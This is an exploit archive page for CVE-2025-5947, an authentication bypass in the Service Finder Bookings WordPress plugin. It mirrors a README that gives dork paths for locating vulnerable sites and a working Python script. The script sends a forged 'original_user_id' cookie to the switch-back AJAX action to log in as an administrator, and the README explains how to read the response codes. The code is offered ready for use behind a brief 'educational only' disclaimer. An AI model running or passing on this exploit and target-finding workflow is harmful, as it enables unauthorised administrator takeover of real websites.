Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-5947 PoC — Service Finder Bookings <= 6.0 - Authentication Bypass via User Switch Cookie

Source
Associated Vulnerability
Title:Service Finder Bookings <= 6.0 - Authentication Bypass via User Switch Cookie (CVE-2025-5947)
Description:The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.
Description
An mini exploit for the Service Finder -Bookings plugin WP 
Readme
# 🔍 WordPress Plugin Exploit — Service Finder (sf-booking)

## Overview

The **Service Finder** plugin is a booking and service management system for WordPress.  
Because of its popularity and complexity, some versions have had security issues related to **unauthenticated AJAX endpoints** or improper access controls.

This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).

---

##  Vulnerable WP dorks

`/wp-content/plugins/service-finder/`

`/wp-content/plugins/service-finder-bookings/`

`/wp-content/plugins/sf-booking/` 

---

##  Exploit Workflow

> ⚠️ **Disclaimer:**  
> These searches are for **educational** and **research** use only. Do **not** attempt unauthorized access or exploitation.

```python
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
```

* `300-399`: ✅ VULN ! Redirect to admin panel as ADMIN
* `400-499`: ⚠️ Client error — the request was invalid or unauthorized, not vuln

---

## References

- WPScan Plugin Database — https://wpscan.com/plugins/  
- National Vulnerability Database (NVD) — https://nvd.nist.gov/  
- OWASP — Google Dorking / reconnaissance techniques  
- HackerOne Disclosure Guidelines — https://www.hackerone.com/disclosure-guidelines

---

##  Author

**[Taha Mounir](https://github.com/M4rgs)**

---
File Snapshot

[4.0K] /data/pocs/7bdb5900e0256c84c12eb11efe78666a73165a9c └── [1.5K] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →